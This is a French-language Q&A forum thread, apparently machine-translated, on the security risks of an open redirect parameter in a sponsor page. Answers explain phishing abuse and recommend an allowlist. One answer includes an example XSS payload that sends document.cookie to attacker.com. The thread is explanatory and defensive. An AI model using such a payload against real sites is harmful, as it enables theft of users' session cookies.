1. Accueil
  2. Question et réponse
  3. Pouvez-vous trouver le problème de sécurité Web ici?

Pouvez-vous trouver le problème de sécurité Web ici?

2008-10-17 9 views
2

J'ai une page Web qui redirige vers une autre page web comme celui-ci:Pouvez-vous trouver le problème de sécurité Web ici?

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

Ensuite, la page Sponsor.php affiche une annonce avec un lien en disant « Continuer sur la page » qui relie au passé dans RedirectPage. Y a-t-il des problèmes de sécurité/d'usurpation d'identité qui pourraient en découler? Quelle est la meilleure façon de gérer cela? (Notez que l'utilisateur n'est pas connecté à l'un ou l'autre site)

Source

2008-10-17 NotDan

+0

S'il n'y a pas de connexion sur l'un ou l'autre site, il n'y a pas de problème de sécurité. – NotMe

Répondre

10

C'est un gros problème. Si je vous envoie un lien qui ressemble à ceci:

http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

Vous allez penser « Oh, CNN, qui est un site légitime », et vous l'ouvrir et cliquez sur le « Continuer à votre page » lien. Et puis vous serez sur l'un des sites porno les plus méchants sur le net et il aura une voix d'homme géant en plein essor annonçant à tous vos collègues "Hot Damn je veux! @ $ @ # $ Votre! (& ¤ &^§ $ jusqu'à ce que je ne peux pas ¡⌐^(! # ~~ & $^#! @ $ !! "et vous devrez expliquer à votre patron "Je pensais que c'était CNN!"

Le trou ici est votre réputation. aveugles réoriente

comme celui-ci sont dangereux. Et c'est juste un trou. Comment cela?

http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

Maintenant, j'ai XSS-ed votre site et volé les cookies de votre utilisateur. Bien sûr, vous dites qu'il n'y a pas d'informations de connexion, mais qu'en est-il des données de session? Ou lorsque vous ajoutez un identifiant plus tard, ou quelqu'un d'autre dans votre entreprise utilise cette page un an plus tard où les utilisateurs sont connectés.

Source

2009-07-06 20:37:38

+0

Excellent. :) abcd –

0

Ceci est certainement un risque de sécurité. Vous devriez éviter d'utiliser des variables dans l'URL lorsque la sécurité est en cause.

Bien que rien n'est totalement sécurisé, c'est une bien meilleure façon de traiter cette question: http://www.webmasterworld.com/forum88/2910.htm

Source

2008-10-17 01:45:15 PHLAK

+0

Juste par curiosité, pourquoi étiqueter ce risque de sécurité? La raison pour laquelle je demande est que le PO a explicitement déclaré qu'il n'y a pas d'informations d'ouverture de session à risque. – NotMe

0

Si sponsor.php permet à toute valeur dans RedirectPage et les annonces implique une approbation, ou encourager les gens à penser qu'ils sont sur la bonne voie que vous l'ouvrirez pour faire partie d'une attaque de phishing. Pire, vous auriez probablement profité de ces attaques, ce qui aurait probablement rendu les gens plutôt mécontents. Garder une liste des URL permises (ou des modèles qu'ils peuvent suivre) contribuerait grandement à prévenir les problèmes.

Source

2008-10-17 01:46:52 acrosman

Questions connexes

 Questions connexes